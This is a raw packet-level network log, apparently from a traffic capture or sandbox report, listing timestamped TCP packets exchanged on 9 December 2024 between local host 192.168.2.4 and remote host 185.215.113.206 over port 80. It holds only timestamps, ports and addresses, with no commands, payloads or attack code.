Dec 9, 2024 08:08:37.457617044 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.457662106 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.458503962 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.458555937 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.458642960 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.458729029 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.459521055 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.459564924 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.459734917 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.459783077 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.460810900 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.460823059 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.460860968 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.461576939 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.461621046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.461652040 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.461692095 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.462548018 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.462590933 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.462645054 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.462749958 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.463577032 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.463650942 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.463766098 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.463825941 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.464605093 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.464669943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.464672089 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.464710951 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.465549946 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.465601921 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.465648890 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.465751886 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.469253063 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.469264984 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.469275951 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.469285965 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.469299078 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.469305038 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.469320059 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.469364882 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.469399929 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.469582081 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.470359087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.470412016 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.470511913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.470602989 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.471436024 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.471487045 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.471621037 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.471672058 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.472563028 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.472606897 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.472702980 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.472773075 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.473438025 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.473534107 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.473593950 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.473635912 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.474375963 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.474430084 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.508842945 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.508896112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.508975029 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.509016991 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.509248018 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.509289980 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.509372950 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.509413004 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.510261059 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.510309935 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.510401964 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.510659933 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.511125088 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.511169910 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.511271954 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.511311054 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.512228966 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.512240887 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.512284040 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.513226032 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.513264894 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.513360023 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.513447046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.514395952 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.514408112 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.514437914 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.514451027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.514962912 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.514982939 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.515012980 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.515043020 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.515548944 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.515604973 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.515656948 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.515733004 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.516508102 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.516556025 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.516560078 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.516590118 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.517595053 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.517644882 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.517684937 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.518548965 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.518595934 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.518647909 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.518682003 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.522512913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.522525072 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.522536039 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.522547960 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.522568941 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.522603989 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.579528093 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.579566956 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.579576969 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.579611063 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.579732895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.579781055 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.579840899 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.579880953 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.580748081 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.580765963 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.580816031 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.581758976 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.581809998 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.581866026 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.581903934 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.582767963 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.582809925 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.582828045 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.582864046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.583781004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.583837986 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.583878040 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.583925009 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.584768057 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.584819078 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.584876060 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.584913969 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.585766077 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.585813046 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.633044004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.633106947 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.633148909 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.633513927 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.633554935 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.633759022 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.633797884 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.633925915 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.633964062 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.634699106 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.634743929 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.634787083 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.634829044 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.635719061 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.635757923 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.635796070 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.635829926 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.636778116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.636854887 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.636898041 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.637692928 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.637732983 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.637753010 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.637789011 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.638768911 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.638813019 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.638891935 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.638940096 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.639744997 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.639785051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.639866114 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.639906883 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.640702009 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.640749931 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.640810013 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.640893936 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.641670942 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.641711950 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.641729116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.641767025 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.642621994 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.642684937 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.642736912 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.642776012 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.643593073 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.643636942 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.643724918 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.644078970 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.644576073 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.644618034 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.644653082 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.644726992 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.645517111 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.645560026 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.645648956 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.645690918 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.646469116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.646508932 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.646581888 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.646622896 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.647458076 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.647496939 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.647562981 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.647603035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.648365021 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.648477077 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.648514986 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.649315119 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.649374008 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.649405956 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.649442911 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.650273085 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.650311947 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.650383949 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.650422096 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.651259899 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.651302099 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.651422977 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.651462078 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.652179956 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.652287960 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.652326107 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.653130054 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.653171062 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.653244972 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.653287888 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.654133081 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.654175997 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.654287100 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.654325008 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.655038118 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.655081034 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.655160904 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.655198097 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.655987978 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.656028032 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.656106949 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.656955004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.656994104 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.657049894 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.657083988 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.657897949 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.657936096 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.658018112 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.658056974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.658863068 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.658900976 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.658974886 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.659013033 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.659809113 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.659847975 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.659918070 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.659950972 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.660758972 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.660870075 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.660907030 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.661710978 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.661748886 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.661807060 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.661849976 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.662679911 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.662719965 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.662775040 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.662807941 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.663624048 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.663662910 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.663750887 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.663789988 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.700263023 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.700328112 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.700396061 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.700547934 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.700587988 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.700668097 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.700711012 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.701503992 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.701541901 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.701627970 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.701668024 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.702446938 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.702478886 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.702550888 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.702590942 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.703471899 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.703511953 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.703567982 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.703605890 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.704338074 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.704459906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.704499960 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.705302000 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.705341101 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.705395937 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.705434084 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.706288099 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.706326962 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.706409931 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.706448078 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.707247019 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.707284927 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.707300901 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.707334042 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.708161116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.708229065 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.708265066 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.708311081 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.709153891 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.709280968 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.709323883 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.710081100 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.710124016 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.710154057 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.710195065 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.711039066 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.711081028 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.711103916 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.711144924 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.711987019 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.712027073 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.712064981 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.713362932 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.771682978 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.771709919 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.771733999 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.771770000 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.772159100 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.772202015 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.772228003 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.772259951 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.772878885 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.772919893 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.773222923 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.773253918 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.773828983 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.773886919 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.774317980 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.774365902 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.774830103 CET	80	49827	185.215.113.206	192.168.2.4
